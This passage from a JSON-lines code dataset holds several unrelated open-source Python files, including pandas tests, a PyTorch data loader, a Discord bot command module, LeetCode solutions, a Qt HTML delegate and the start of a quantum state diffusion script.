8]\n        str(df)\n        df['column1'] = df['column1'] + 'c'\n        str(df)\n\n        # from SO:\n        # http://stackoverflow.com/questions/24054495/potential-bug-setting-value-for-undefined-column-using-iloc\n        df = DataFrame(np.arange(0, 9), columns=['count'])\n        df['group'] = 'b'\n\n        def f():\n            df.iloc[0:5]['group'] = 'a'\n\n        self.assertRaises(com.SettingWithCopyError, f)\n\n        # mixed type setting\n        # same dtype & changing dtype\n        df = DataFrame(dict(A=date_range('20130101', periods=5),\n                            B=np.random.randn(5),\n            
C=np.arange(5, dtype='int64'),\n D=list('abcde')))\n\n def f():\n df.ix[2]['D'] = 'foo'\n\n self.assertRaises(com.SettingWithCopyError, f)\n\n def f():\n df.ix[2]['C'] = 'foo'\n\n self.assertRaises(com.SettingWithCopyError, f)\n\n def f():\n df['C'][2] = 'foo'\n\n self.assertRaises(com.SettingWithCopyError, f)\n\n def test_setting_with_copy_bug(self):\n\n # operating on a copy\n df = pd.DataFrame({'a': list(range(4)),\n 'b': list('ab..'),\n 'c': ['a', 'b', np.nan, 'd']})\n mask = pd.isnull(df.c)\n\n def f():\n df[['c']][mask] = df[['b']][mask]\n\n self.assertRaises(com.SettingWithCopyError, f)\n\n # invalid warning as we are returning a new object\n # GH 8730\n df1 = DataFrame({'x': Series(['a', 'b', 'c']),\n 'y': Series(['d', 'e', 'f'])})\n df2 = df1[['x']]\n\n # this should not raise\n df2['y'] = ['g', 'h', 'i']\n\n def test_detect_chained_assignment_warnings(self):\n\n # warnings\n with option_context('chained_assignment', 'warn'):\n df = DataFrame({'A': ['aaa', 'bbb', 'ccc'], 'B': [1, 2, 3]})\n with tm.assert_produces_warning(\n expected_warning=com.SettingWithCopyWarning):\n df.loc[0]['A'] = 111\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/pandas-dev_pandas/pandas-master/pandas/tests/indexing/test_chaining_and_caching.py","file_name":"test_chaining_and_caching.py","file_ext":"py","file_size_in_byte":11981,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"41115786901","text":"\nimport importlib\nimport torch.utils.data\nfrom data.base_dataset import BaseDataset\n\n\ndef find_dataset_using_name(dataset_name):\n dataset_filename = \"data.\" + dataset_name + \"_dataset\"\n datasetlib = importlib.import_module(dataset_filename)\n\n dataset = None\n target_dataset_name = dataset_name.replace('_', '') + 'dataset'\n for name, cls in datasetlib.__dict__.items():\n if name.lower() == target_dataset_name.lower() \\\n and issubclass(cls, BaseDataset):\n dataset = cls\n\n if dataset is None:\n raise NotImplementedError(\"In %s.py, there should be a subclass of BaseDataset with class name that matches %s in lowercase.\" % (dataset_filename, target_dataset_name))\n\n return dataset\n\n\ndef get_option_setter(dataset_name):\n dataset_class = find_dataset_using_name(dataset_name)\n return dataset_class.modify_commandline_options\n\ndef create_dataset_to_iid(opt, aug_data, dataType = 'train',batch_size = 256):\n data_loader = CustomDatasetIIDDataLoader(opt, aug_data, dataType, batch_size)\n dataset = data_loader.load_data()\n return dataset\n\n\n\ndef create_dataset(opt,dataType = 'train',batch_size = 256):\n data_loader = CustomDatasetDataLoader(opt,dataType,batch_size)\n dataset = data_loader.load_data()\n return dataset\n\nclass CustomDatasetIIDDataLoader():\n def __init__(self, opt,aug_data,dataType,batch_size):\n self.opt = opt\n dataset_class = find_dataset_using_name(opt.dataset_fuse_mode)\n self.dataset = dataset_class(opt, aug_data,dataType)\n print(\"dataset [%s] was created\" % type(self.dataset).__name__)\n self.dataloader = torch.utils.data.DataLoader(\n self.dataset,\n batch_size=batch_size,\n shuffle=not opt.serial_batches,\n num_workers=int(opt.num_threads),\n drop_last=True)\n\n def load_data(self):\n return self\n\n def __len__(self):\n return min(len(self.dataset), self.opt.max_dataset_size)\n\n def __iter__(self):\n \"\"\"Return a batch of data\"\"\"\n for i, data in enumerate(self.dataloader):\n if i * self.opt.batch_size >= self.opt.max_dataset_size:\n break\n yield data\n\nclass 
CustomDatasetDataLoader():\n\n    def __init__(self, opt,dataType,batch_size):\n        self.opt = opt\n        dataset_class = find_dataset_using_name(opt.dataset_mode)\n        self.dataset = dataset_class(opt,dataType)\n        print(\"dataset [%s] was created\" % type(self.dataset).__name__)\n        self.dataloader = torch.utils.data.DataLoader(\n            self.dataset,\n            batch_size=batch_size,\n            shuffle=not opt.serial_batches,\n            num_workers=int(opt.num_threads),\n            drop_last=True)\n\n    def load_data(self):\n        return self\n\n    def __len__(self):\n        return min(len(self.dataset), self.opt.max_dataset_size)\n\n\n    def __iter__(self):\n        for i, data in enumerate(self.dataloader):\n            if i * self.opt.batch_size >= self.opt.max_dataset_size:\n                break\n            yield data\n","repo_name":"Sheng-T/FedMGD","sub_path":"data/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"21"}
+{"seq_id":"41129554412","text":"#!/usr/bin/env python\n\"\"\"Django's command-line utility for administrative tasks.\"\"\"\nimport os\nimport sys\nfrom elasticsearch import Elasticsearch, ElasticsearchException\nimport time\n\n\ndef make_index():\n    es = Elasticsearch(\"elasticsearch:9200\")\n    index = \"earthquake\"\n    time.sleep(15)\n    while True:\n        flag = es.ping()\n        if flag:\n            print(flag)\n            break\n        else:\n            print(\"API2 is waiting for DB...\")\n            time.sleep(5)\n\n    time.sleep(5)\n    exist = es.indices.exists(\"earthquake\")\n    if not exist:\n        es.index(index=\"earthquake\", body={\"id\": \"dummy\"})\n        # es.create(index=\"earthquake\")\n        # es.indices()\n\n\ndef main():\n    \"\"\"Run administrative tasks.\"\"\"\n    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'api2.settings')\n    try:\n        from django.core.management import execute_from_command_line\n    except ImportError as exc:\n        raise ImportError(\n            \"Couldn't import Django. Are you sure it's installed and \"\n            \"available on your PYTHONPATH environment variable? Did you \"\n            \"forget to activate a virtual environment?\"\n        ) from exc\n    execute_from_command_line(sys.argv)\n\n\nif __name__ == '__main__':\n    make_index()\n    main()\n","repo_name":"thisishoon/backend-engineering","sub_path":"api2/api2/manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"31134517698","text":"import discord\nimport pickledb\nfrom datetime import *\nfrom otherdave.util import config, constants\n\nignoreDb = pickledb.load(\"./data/ignore.db\", True)\nslideDb = pickledb.load(\"./data/slide.db\", True)\n\ndef ignore(interaction: discord.Interaction, user: discord.Member, mins: int) -> str:\n    ignoreTime = datetime.now() + timedelta(minutes=mins)\n\n    if (interaction.user.id == user.id):\n        ignoreDb.set(str(user.id), ignoreTime.isoformat())\n        return config.emotions[\"_zipit\"]\n    else:\n        author = interaction.user.name\n        if (author != \"Isaac\" and author != \"MercWorks\"):\n            return \"Mama Mia! Only Dave can do that!\"\n\n        ignoreDb.set(user.id, ignoreTime.isoformat())\n        return f\"Got it, I'll ignore {user.mention} for {mins} minutes. They must have been *naughty!*\"\n\ndef ignoreBandit(mins: int) -> str:\n    bandit = \"442747712400654337\"\n    ignoreTime = datetime.now() + timedelta(minutes=mins)\n    ignoreDb.set(bandit, ignoreTime.isoformat())\n    return f\"Got it, I'll ignore <@!{bandit}> for {mins} minutes. 
They must have been *naughty!*\"\n\ndef dms(userId: int, flag: str) -> str:\n userId = str(userId)\n if (flag == \"enable\"):\n if (slideDb.get(userId)):\n slideDb.rem(userId)\n return \"Got it, I'll be sliding into those dms sometime soon.\"\n elif (flag == \"disable\"):\n slideDb.set(userId, True)\n return \"Okay, I won't send you any direct messages.\"\n else:\n return constants.dmsUsage\n\ndef callerNotIgnored(interaction: discord.Interaction) -> bool:\n return not shouldIgnore(interaction.user.id)\n\ndef shouldIgnore(userId: int) -> bool:\n userId = str(userId)\n timeStr = ignoreDb.get(userId)\n if (timeStr):\n ignoreTime = datetime.fromisoformat(timeStr)\n if (datetime.now() > ignoreTime):\n ignoreDb.rem(userId)\n return False\n return True\n return False\n\ndef canDm(userId: int) -> bool:\n userId = str(userId)\n return slideDb.get(userId) != True","repo_name":"ibanner56/OtherDave","sub_path":"otherdave/commands/ignore.py","file_name":"ignore.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14090392473","text":"from pyDSAlgo.DS import PyDS\n\n\nclass Node:\n def __init__(self, key):\n self.key = key\n self.left = None\n self.right = None\n\n\nclass PyBinarySearchTree(PyDS):\n def __init__(self):\n super().__init__()\n self.root = None\n\n def insert(self, key):\n self.root = self._insert_recursive(self.root, key)\n\n def _insert_recursive(self, root, key):\n if root is None:\n return Node(key)\n if key < root.key:\n root.left = self._insert_recursive(root.left, key)\n else:\n root.right = self._insert_recursive(root.right, key)\n return root\n\n def search(self, key):\n return self._search_recursive(self.root, key)\n\n def _search_recursive(self, root, key):\n if root is None or root.key == key:\n return root\n if key < root.key:\n return self._search_recursive(root.left, key)\n else:\n return self._search_recursive(root.right, key)\n\n def delete(self, key):\n self.root = self._delete_recursive(self.root, key)\n\n def _delete_recursive(self, root, key):\n if root is None:\n return root\n if key < root.key:\n root.left = self._delete_recursive(root.left, key)\n elif key > root.key:\n root.right = self._delete_recursive(root.right, key)\n else:\n if root.left is None:\n return root.right\n elif root.right is None:\n return root.left\n root.key = self._get_min_value(root.right)\n root.right = self._delete_recursive(root.right, root.key)\n return root\n\n @staticmethod\n def _get_min_value(root):\n current = root\n while current.left is not None:\n current = current.left\n return current.key\n\n def inorder_traversal(self):\n self._inorder_recursive(self.root)\n\n def _inorder_recursive(self, root):\n if root is not None:\n self._inorder_recursive(root.left)\n print(root.key, end=\" \")\n self._inorder_recursive(root.right)\n","repo_name":"sattyamjjain/pyDSAlgo","sub_path":"pyDSAlgo/DS/Tree/PyBinarySearchTree.py","file_name":"PyBinarySearchTree.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25810671355","text":"\"\"\"\nhtmldelegate --- QStyledItemDelegate delegate. 
Draws HTML\n=========================================================\n\"\"\"\n\nfrom PyQt5.QtWidgets import QApplication, \\\n    QStyledItemDelegate, QStyle, QStyleOptionViewItem, \\\n    QWidget\nfrom PyQt5.QtGui import QAbstractTextDocumentLayout, \\\n    QTextDocument, QPalette\nfrom PyQt5.QtCore import QSize\n\n\n_HTML_ESCAPE_TABLE = \\\n    {\n        \"&\": \"&amp;\",\n        '\"': \"&quot;\",\n        \"'\": \"&#39;\",\n        \">\": \"&gt;\",\n        \"<\": \"&lt;\",\n        \" \": \"&nbsp;\",\n        \"\\t\": \"&nbsp;&nbsp;&nbsp;&nbsp;\",\n    }\n\n\ndef htmlEscape(text):\n    \"\"\"Replace special HTML symbols with escape sequences\n    \"\"\"\n    return \"\".join(_HTML_ESCAPE_TABLE.get(c, c) for c in text)\n\n\nclass HTMLDelegate(QStyledItemDelegate):\n    \"\"\"QStyledItemDelegate implementation. Draws HTML\n\n    http://stackoverflow.com/questions/1956542/how-to-make-item-view-render-rich-html-text-in-qt/1956781#1956781\n    \"\"\"\n\n    def __init__(self, parent=None):\n        if isinstance(parent, QWidget):\n            self._font = parent.font()\n        else:\n            self._font = None\n\n        QStyledItemDelegate.__init__(self, parent)\n\n    def paint(self, painter, option, index):\n        \"\"\"QStyledItemDelegate.paint implementation\n        \"\"\"\n        option.state &= ~QStyle.State_HasFocus # never draw focus rect\n\n        option.state |= QStyle.State_Active # draw fuzzy-open completion as focused, even if focus is on the line edit\n\n        options = QStyleOptionViewItem(option)\n        self.initStyleOption(options, index)\n\n        style = QApplication.style() if options.widget is None else options.widget.style()\n\n        doc = QTextDocument()\n        if self._font is not None:\n            doc.setDefaultFont(self._font)\n\n        doc.setDocumentMargin(1)\n        doc.setHtml(options.text)\n        # bad long (multiline) strings processing doc.setTextWidth(options.rect.width())\n\n        options.text = \"\"\n        style.drawControl(QStyle.CE_ItemViewItem, options, painter)\n\n        ctx = QAbstractTextDocumentLayout.PaintContext()\n\n        # Highlighting text if item is selected\n        if option.state & QStyle.State_Selected:\n            ctx.palette.setColor(QPalette.Text,\n                                 option.palette.color(QPalette.Active, QPalette.Text))\n\n        textRect = style.subElementRect(QStyle.SE_ItemViewItemText, options)\n        painter.save()\n        painter.translate(textRect.topLeft())\n        painter.setClipRect(textRect.translated(-textRect.topLeft()))\n        doc.documentLayout().draw(painter, ctx)\n\n        painter.restore()\n\n    def sizeHint(self, option, index):\n        \"\"\"QStyledItemDelegate.sizeHint implementation\n        \"\"\"\n        options = QStyleOptionViewItem(option)\n        self.initStyleOption(options, index)\n\n        doc = QTextDocument()\n        if self._font is not None:\n            doc.setDefaultFont(self._font)\n        doc.setDocumentMargin(1)\n        # bad long (multiline) strings processing doc.setTextWidth(options.rect.width())\n        doc.setHtml(options.text)\n        return QSize(doc.idealWidth(), doc.size().height())\n","repo_name":"andreikop/enki","sub_path":"enki/lib/htmldelegate.py","file_name":"htmldelegate.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"21"}
{"seq_id":"3398059590","text":"# This file determines draw odds by performing a mock drawing for various scenarios\nimport random\n\n\nclass ApplicantNode:\n    \"\"\"A node for the applicant bag (stored in a plain Python list rather than a linked list). 
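An applicant holding p preference points is entered p**2 times in the bag (a zero-point applicant once), so higher-point applicants are proportionally more likely to be drawn. 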
The node contains the point category and the adjusted number of applicants for\n    that point cat (after accounting for point squaring).\"\"\"\n\n    def __init__(self, app_id: int, point_val: int):\n        self.app_id = app_id\n        self.point_val = point_val\n\n        if self.point_val == 0:\n            self.apps = 1\n        else:\n            self.apps = (self.point_val ** 2)\n\n\nclass AppBag:\n    \"\"\"A data structure that represents a random bag of applicants.\"\"\"\n\n    def __init__(self):\n        self.bag = []\n        self.size = 0\n\n    def add_to_bag(self, applicant: ApplicantNode):\n        \"\"\"Adds an applicant to the bag. NOTE - bag must be randomized by calling randomize_bag after adding all\n        applicants to the bag.\"\"\"\n        self.bag.append(applicant)\n        self.size += 1\n\n    def randomize_bag(self):\n        \"\"\"Randomizes the applicants in the bag.\"\"\"\n        # loop through the bag list, for every index create a new random index between 0 and list length. Swap the\n        # current element with the random index.\n        random.seed()\n        for curr_index in range(self.size):\n            rand_index = random.randint(0, self.size - 1)\n            curr_applicant = self.bag[curr_index]\n            swap_applicant = self.bag[rand_index]\n            self.bag[rand_index] = curr_applicant\n            self.bag[curr_index] = swap_applicant\n\n    def draw_from_bag(self, index: int):\n        \"\"\"Returns an applicant ID from the bag. Index should be randomized when drawing from the bag to have a\n        true random draw.\"\"\"\n        return self.bag[index]\n\n\ndef analyze_trends(app_array: list):\n    \"\"\"This function requires a 2D array with rows acting as years and columns acting as point values. The numbers in\n    the 2D array must be the number of applications in that point category. The function analyzes the trends and\n    determines what next year's drawing might look like. It returns a list (with columns as point cats) with the\n    anticipated number of applicants for that point category in the next year.\"\"\"\n    # Simple trend model (one of several reasonable choices): extrapolate each\n    # point category linearly using the average year-over-year change.\n    if not app_array:\n        return []\n    if len(app_array) == 1:\n        return list(app_array[0])\n    anticipated = []\n    for cat in range(len(app_array[0])):\n        deltas = [app_array[yr + 1][cat] - app_array[yr][cat] for yr in range(len(app_array) - 1)]\n        avg_delta = sum(deltas) / len(deltas)\n        anticipated.append(max(0, round(app_array[-1][cat] + avg_delta)))\n    return anticipated\n\n\nclass DrawSimul:\n\n    def __init__(self, expected_apps: list, tag: str, num_tags: int):\n        self.tag = tag\n        self.num_tags = num_tags\n        self.expected_apps = expected_apps\n\n        # attribute to throw the applicant IDs into for the random drawing\n        self.apps_bag = AppBag()\n\n        # attribute to hold what IDs have been drawn from the bag already so we don't double draw\n        self.draw_ids = set()\n\n        # attribute to hold the results of the drawings (number of applicants selected in each point cat)\n        self.dwg_results = [0]*21\n\n    def draw_rand_id(self):\n        \"\"\"Draws a random ID from the apps_bag. 
Keeps drawing until an ID that hasn't been drawn gets drawn.\"\"\"\n random.seed()\n rand_index = random.randint(0, self.apps_bag.size - 1)\n rand_applicant = self.apps_bag.draw_from_bag(rand_index)\n\n if rand_applicant.app_id in self.draw_ids:\n return self.draw_rand_id()\n\n self.dwg_results[rand_applicant.point_val] += 1\n self.draw_ids.add(rand_applicant.app_id)\n\n def add_applicants_to_bag(self):\n \"\"\"Adds all of the applicants to the bag for drawing.\"\"\"\n app_id = 0\n for i, applicants in enumerate(self.expected_apps):\n for app in range(applicants):\n new_app = ApplicantNode(app_id, i)\n while new_app.apps > 0:\n self.apps_bag.add_to_bag(new_app)\n new_app.apps -= 1\n app_id += 1\n\n for i in range(2):\n self.apps_bag.randomize_bag()\n\n def run_drawing(self):\n \"\"\"performs a drawing\"\"\"\n # add all the applicants to the bag\n self.add_applicants_to_bag()\n\n # draw random applicants from the bag until you hit the number of tags\n # NOTE - self.draw_rand_id retries automatically if you re-draw a certain person\n for _ in range(self.num_tags):\n self.draw_rand_id()\n\n return self.dwg_results\n","repo_name":"philip-peiffer/hunting-stats","sub_path":"Drawing_Simulation/DrawSimul.py","file_name":"DrawSimul.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74546117812","text":"from Binarysearchtree import Node\nfrom Binarysearchtree import BinarySearchTree\n\nclass BinarySearchTree_withsumpathprint(BinarySearchTree):\n def sumpath_print(self, s):\n if not self._root:\n return []\n ls = []\n re = []\n self.__sumpath_print(self._root, s, ls, re)\n return re\n\n def __sumpath_print(self, node, s, ls, re):\n\n if not node._left and not node._right and node._item == s:\n ls.append(node._item)\n re.append(ls)\n\n if node._left:\n self.__sumpath_print(node._left, s-node._item, ls+[node._item], re)\n\n if node._right:\n self.__sumpath_print(node._right, s-node._item, ls+[node._item], re)\n\nif __name__ == '__main__':\n numbers = [6, 4, 8, 7, 9, 2, 1, 3, 5, 13, 11 ,10, 12]\n bst = BinarySearchTree_withsumpathprint()\n for nu in numbers:\n bst.add(nu)\n\n bst.print_inorder()\n print()\n print(bst.sumpath_print(15))\n\n","repo_name":"yuzhecd/al_py","sub_path":"Tree/pathsum_print.py","file_name":"pathsum_print.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10077396668","text":"# encoding=utf8\n\n'''\n面试题 17.21. Volume of Histogram LCCI\nImagine a histogram (bar graph). Design an algorithm to compute the volume of water it could hold if someone poured water across the top. You can assume that each histogram bar has width 1.\n\n\n\nThe above elevation map is represented by array [0,1,0,2,1,0,1,3,2,1,2,1]. In this case, 6 units of water (blue section) are being trapped. Thanks Marcos for contributing this image!\n\nExample:\n\nInput: [0,1,0,2,1,0,1,3,2,1,2,1]\nOutput: 6\n\n\n面试题 17.21. 
Volume of Histogram (直方图的水量)\nGiven a histogram (also called a bar chart), suppose water is poured onto it from above without stopping; how much water can the histogram hold in the end? The width of each bar is 1.\n\n\n\nThe histogram above is represented by the array [0,1,0,2,1,0,1,3,2,1,2,1]; in this case it can hold 6 units of water (the blue section represents water). Thanks to Marcos for contributing this image.\n\nExample:\n\nInput: [0,1,0,2,1,0,1,3,2,1,2,1]\nOutput: 6\n'''\n\n\nclass Solution(object):\n    def trap(self, height):\n        \"\"\"\n        :type height: List[int]\n        :rtype: int\n        \"\"\"\n        # dynamic programming\n        if not height:\n            return 0\n        length = len(height)\n\n        max_left = [height[0]]\n        max_right = [0 for _ in range(length-1)] + [height[-1]]\n\n        for i in range(1, length):\n            j = length - i - 1\n            max_left.append(max(max_left[i-1], height[i-1]))\n            max_right[j] = max(height[j+1], max_right[j+1])\n\n        res = 0\n        for i in range(length):\n            res += max(0, min(max_right[i]-height[i], max_left[i] - height[i]))\n\n        return res\n\n\nclass Solution1(object):\n    def trap(self, height):\n        \"\"\"\n        :type height: List[int]\n        :rtype: int\n        \"\"\"\n        # two pointers\n        length = len(height)\n        i, j = 0, length - 1\n\n        left_max = height[0]\n        right_max = height[-1]\n\n        res = 0\n        while i < j:\n            left_max = max(height[i], left_max)\n            right_max = max(height[j], right_max)\n            if height[i] < height[j]:\n                res += left_max - height[i]\n                i += 1\n            else:\n                res += right_max - height[j]\n                j -= 1\n        return res\n\n","repo_name":"MecaCho/algorithms_training","sub_path":"algorithms/dynamic-programming/leetcode-17.21-VolumeofHistogramLCCI.py","file_name":"leetcode-17.21-VolumeofHistogramLCCI.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"4675941317","text":"import sys\n\ncount_dept_dict = {}\nadjacency_square_matrix = [[0 for i in range(40)] for j in range(40)]\n\ndef multiplyRowColumn(row_list, column_list):\n    sum = 0\n\n    for i in range(40):\n        sum += row_list[i]*column_list[i]\n\n    return sum\n\n\nfor line in sys.stdin:\n    # Read row and column indices and values\n    row_data, column_data = line.split('\t')\n    row, row_values = row_data.split(\" \")\n    column, column_values = column_data.split(\" \")\n\n    row = int(row)\n    column = int(column)\n\n    # Prepare row values\n    row_values = row_values.strip('[').strip(']').split(',')\n    row_values = [int(x) for x in row_values]\n\n    # Prepare column values\n    column_values = column_values.strip('[').strip('\\n').strip(']').split(',')\n    column_values = [int(x) for x in column_values]\n\n    # Calculation of matrix square\n    adjacency_square_matrix[row][column] = multiplyRowColumn(row_values, column_values)\n    \n# Printing result for common nodes\nfor row in range(40):\n    for column in range(row + 1, 40): \n        if adjacency_square_matrix[row][column] != 0:\n            print (row, column, adjacency_square_matrix[row][column])\n\n\nprint(\"Any node pair not present in this file has no common nodes \")","repo_name":"shrysh8bit/Computing-Lab-2","sub_path":"No SQL 2/Query3/reducer2.py","file_name":"reducer2.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"555227243","text":"from django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n    path(\"\", views.index, name=\"index\"),\n    path(\"search\", views.searchBox, name=\"search\"),\n    path(\"add\", views.add, name=\"add\"),\n    path(\"random\", views.randomEntry, name=\"random\"),\n    path(\"edit\", views.edit, name=\"edit\"),\n    path(\"saveEdit\", views.saveEdit, name=\"save\"),\n    path(\"wiki/<str:entry>\", views.lookup, name=\"entry\")\n]\n","repo_name":"lucascorumba/cs50-web","sub_path":"wiki/encyclopedia/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"6897975557","text":"import unittest\nfrom HW3.graph import find_shortest_path, find_negative_cycles\n\n\nclass TestGraph(unittest.TestCase):\n\n    def test_1(self):\n        result = find_shortest_path(\"path1.txt\", 2., 3.)\n        answer = ([2.0, 5.0, 6.0, 3.0], 5.0)\n        assert result == answer\n\n    def test_2(self):\n        result = find_shortest_path(\"path2.txt\", 2., 4.)\n        answer = ([], float(\"inf\"))\n        assert result == answer\n\n    def test_3(self):\n        result = find_negative_cycles(\"path3.txt\")\n        answer = [[1., 2., 3., 4., 1.], [2., 3., 4., 1., 2.],\n                  [3., 4., 1., 2., 3.], [4., 1., 2., 3., 4.]]\n        assert result in answer\n\n    def test_4(self):\n        result = find_negative_cycles(\"path4.txt\")\n        answer = []\n        assert result == answer\n","repo_name":"krisshen4/BigDataTech","sub_path":"HW3/test_graph/test_graph.py","file_name":"test_graph.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"8006088770","text":"\"\"\"\nGiven an array of strings strs, group the anagrams together. You can return the answer in any order.\n\nAn Anagram is a word or phrase formed by rearranging the letters of a different word or phrase,\ntypically using all the original letters exactly once.\n\nSol: sort each word's letters and use the sorted string as a dictionary key; words that share a key are anagrams.\n\"\"\"\n\n\nclass Solution(object):\n    def groupAnagrams(self, strs):\n        \"\"\"\n        :type strs: List[str]\n        :rtype: List[List[str]]\n        \"\"\"\n        # keyVal = {}\n        # for i in strs:\n        #     keyVal[i] = ''.join(sorted(i))\n        # print(keyVal)\n        # result = {}\n        # for key, val in keyVal.items():\n        #     result.setdefault(val, []).append(key)\n        #\n        # return list(result.values())\n\n        keyVal = {}\n        for i in strs:\n            x = ''.join(sorted(i))\n            if x in keyVal:\n                keyVal[x].append(i)\n            else:\n                keyVal[x] = [i]\n\n        return list(keyVal.values())\n\nobj = Solution()\nprint(obj.groupAnagrams([\"\",\"\"]))\nprint(obj.groupAnagrams([\"abc\",\"abc\"]))","repo_name":"senumulapally/DataStructures","sub_path":"Blind75/Arrays/GroupAnagrams_49.py","file_name":"GroupAnagrams_49.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"34691674160","text":"import os, sys\nfrom logging.config import fileConfig\n\nfrom alembic import context\nfrom sqlalchemy import engine_from_config\nfrom sqlalchemy import pool\n\nsys.path = sys.path + [os.path.abspath(\"../server\")]\nfrom models import metadata\n\n\nconfig = context.config\nfileConfig(config.config_file_name)  # Setup loggers\n\n\ndef run_migrations_offline():\n    context.configure(\n        url=os.environ[\"GD_PGSQL_DSN\"],\n        target_metadata=metadata,\n        literal_binds=True,\n    )\n    with context.begin_transaction():\n        context.run_migrations()\n\n\ndef run_migrations_online():\n    connectable = engine_from_config(\n        config.get_section(config.config_ini_section),\n        url=os.environ[\"GD_PGSQL_DSN\"],\n        prefix=\"sqlalchemy.\",\n        
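# pool.NullPool disables connection pooling; fine for a one-shot migration run\n        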
poolclass=pool.NullPool,\n    )\n    with connectable.connect() as connection:\n        context.configure(connection=connection, target_metadata=metadata)\n        with context.begin_transaction():\n            context.run_migrations()\n\n\nif context.is_offline_mode():\n    run_migrations_offline()\nelse:\n    run_migrations_online()\n","repo_name":"scieloorg/graph-data-experiment","sub_path":"migrations/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"20653069972","text":"# -*- coding: utf-8 -*-\nfrom numpy import *\nfrom scipy import linalg as LA\nfrom matplotlib.pyplot import *\nimport matplotlib.cm as cm\n\n# Plot a multivariate normal distribution\nmu = array([0, 0]) # mean\nS = array([[1, 0.5],[0.5, 2]]) # covariance matrix\nSinv = LA.inv(S)\ndetS = LA.det(S)\n\ndef N(x, y):\n    v = array([x,y])\n    return exp(-(v-mu).T.dot(Sinv).dot(v-mu)/2)/(2*pi*sqrt(detS))\n\nX, Y = meshgrid(linspace(-3, 3, 100), linspace(-3, 3, 100))\nZ = vectorize(N)(X, Y)\n\nxlim(-3, 3)\nylim(-3, 3)\n\npcolor(X, Y, Z, alpha=0.3)\nshow()\n","repo_name":"nineties/prml-seminar","sub_path":"prog/prog2-3.py","file_name":"prog2-3.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"21"}
{"seq_id":"1866048014","text":"#!/usr/bin/env python\n\n'''\n\nMake Quantum Trajectory\nAuthor: Gil Tabak\nDate: Nov 3, 2016\n\nGenerating trajectories using quantum state diffusion. We will be primarily\ninterested in the absorptive bistability (Jaynes-Cummings model).\nI store trajectory files as *.pkl files or *.mat files. This way I can easily\nload them into another notebook, or load the trajectories to matlab.\nRequires Python 3.\n\n'''\n\nfrom quantum_state_diffusion import (\n    qsd_solve,\n    qsd_solve_two_systems\n)\n\nfrom utils import (\n    save2mat,\n    save2pkl,\n    print_params\n)\n\nfrom prepare_regime import (\n    make_system_JC,\n    make_system_kerr_bistable,\n    make_system_kerr_bistable_regime2,\n    make_system_kerr_bistable_regime3,\n    make_system_kerr_bistable_regime4,\n    make_system_kerr_bistable_regime5,\n    make_system_kerr_bistable_regime6,\n    make_system_kerr_bistable_regime7,\n    make_system_kerr_bistable_regime_chose_drive,\n    make_system_kerr_qubit,\n    ## make_system_JC_two_systems, ## Not yet implemented\n    make_system_kerr_bistable_two_systems,\n    make_system_kerr_qubit_two_systems,\n    make_system_empty_then_kerr,\n    make_system_kerr_bistable_regime_chose_drive_two_systems,\n)\n\nimport sdeint\nimport argparse\nimport numpy as np\nimport numpy.linalg as la\nimport logging\nimport os\nimport pickle\nfrom scipy import sparse\nfrom sympy import sqrt\nimport sys\n\nSDEINT_METHODS = {\"itoEuler\": sdeint.itoEuler,\n                  \"itoSRI2\": sdeint.itoSRI2,\n                  ## \"itoMilstein\": itoMilstein.itoSRI2,\n                  \"numItoMilstein\": sdeint.numItoMilstein,\n                  \"itoImplicitEuler\": sdeint.itoImplicitEuler,\n                  \"itoQuasiImplicitEuler\": sdeint.itoQuasiImplicitEuler}\nIMPLICIT_METHODS=[\"itoImplicitEuler\"]\n\n# Log everything to stdout\nlogging.basicConfig(stream=sys.stdout,level=logging.DEBUG)\n\ndef get_parser():\n    '''get_parser returns the arg parse object, for use by an external application (and this script)\n    '''\n    parser = argparse.ArgumentParser(\n        description=\"generating trajectories using quantum state diffusion\")\n\n\n    ################################################################################\n    # General Simulation Parameters\n    ################################################################################\n\n    # Seed\n    
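# (a fixed seed makes the stochastic trajectories reproducible across runs)\n    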
